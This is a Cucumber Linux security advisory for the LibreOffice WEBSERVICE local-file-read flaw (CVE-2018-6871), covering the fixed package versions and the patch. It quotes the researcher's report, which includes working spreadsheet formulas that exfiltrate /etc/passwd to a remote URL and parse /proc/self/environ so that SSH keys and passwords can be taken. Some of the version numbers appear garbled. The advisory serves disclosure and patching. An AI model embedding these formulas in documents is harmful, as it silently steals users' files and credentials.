Other IDs this deficiency may be known by:
|Date Last Modified
Version Specific Information:
|Cucumber 1.0 i686||fixed in libreoffice-18.104.22.168-i686-2 |
|Cucumber 1.0 x86_64||fixed in libreoffice-22.214.171.124-x86_64-2 |
|Cucumber 1.1 i686
||fixed in libreoffice-126.96.36.199-i686-2 |
|Cucumber 1.1 x86_64
||fixed in libreoffice-188.8.131.52-x86_64-2 |
********* THIS VULNERABILITY HAS THE DUPLICATE CVE ID OF CVE-2018-1055 *********
The ID CVE-2018-6871 should be used instead of CVE-2018-1055. See:
=================================== Overview ===================================
LibreOffice through 6.0.1 allows remote attackers to read arbitrary files via
=WEBSERVICE calls in a document, which use the COM.MICROSOFT.WEBSERVICE
================================ Initial Report ================================
LibreOffice supports COM.MICROSOFT.WEBSERVICE function:
The function is required to obtain data by URL, usually used as:
For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE
returns the #VALUE! error value.
In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.
By default the cells are not updated, but if you specify the cell type like
~error, then the cell will be updated when you open document.
To read file you need just:
This function can also be used to send a file:
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
For successful operation, you need to send the files of the current user, so
you need to retrieve current user home path.
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",
Also you can parse other files too, like a ~/.ssh/config or something like
For other than LibreOffice Calc formats you just need embed calc object to
other document (I checked it works).
It is easy to send any files with keys, passwords and anything else. 100%
success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all
operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in
almost all formats supporting by LO.
Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich &&
Andrew Krasichkov (according to LibreOffice team notes).
============================ Additional Information ============================
From the official LibreOffice security advisory
Announced: February 9, 2018
Fixed in: LibreOffice 5.4.5/6.0.1
LibreOffice Calc supports a WEBSERVICE function to obtain data by URL.
Vulnerable versions of LibreOffice allow WEBSERVICE to take a local file URL
(e.g file://) which can be used to inject local files into the spreadsheet
without warning the user. Subsequent formulas can operate on that inserted data
and construct a remote URL whose path leaks the local data to a remote
In later versions of LibreOffice without this flaw, WEBSERVICE has now been
limited to accessing http and https URLs along with bringing WEBSERVICE URLs
under LibreOffice Calc's link management infrastructure.
All users are recommended to upgrade to LibreOffice >= 5.4.5 or >= 6.0.1
Thanks to Ronnie Goodrich and Andrew Krasichkov for discovering this flaw.
================================= Our Analysis =================================
----- Affected Products -----
Versions of LibreOffice prior to 6.0.1 and 5.4.5 that have not had the patch
applied are vulnerable to this vulnerability. This includes LibreOffice as
originally packaged on Cucumber Linux 1.0 and 1.1. Versions greater than or
equal to 6.0.1 or 5.4.5 are not affected.
----- Scope and Impact of this Vulnerability -----
This vulnerability allows a remote attacker to read an arbitrary file via a
specially crafted document. All that is required from the end user is opening
the malicious document in an affected version of LibreOffice.
----- Fix for this Vulnerability -----
This vulnerability can be fixed by upgrading to LibreOffice 6.0.1 or 5.4.5 or by
applying the patch from
================================= Our Solution =================================
We have applied the aforementioned patch and rebuilt.